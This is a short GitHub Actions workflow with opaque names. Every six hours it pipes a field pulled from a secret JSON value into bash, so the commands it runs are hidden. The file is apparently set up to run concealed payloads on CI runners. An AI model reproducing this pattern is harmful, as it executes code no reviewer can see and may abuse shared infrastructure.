name: zengshunshen6789
on:
  workflow_dispatch:
  schedule:
    - cron: '18 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zengshunshen6789
        env:
          yf5: ${{ secrets.yf5 }}
        run: |
          echo $yf5 | jq -r .plvf274 | /bin/bash
          echo $hz1123 | jq -r .we398 | /bin/bash
          echo $j20599 | jq -r .oyh788 | /bin/bash

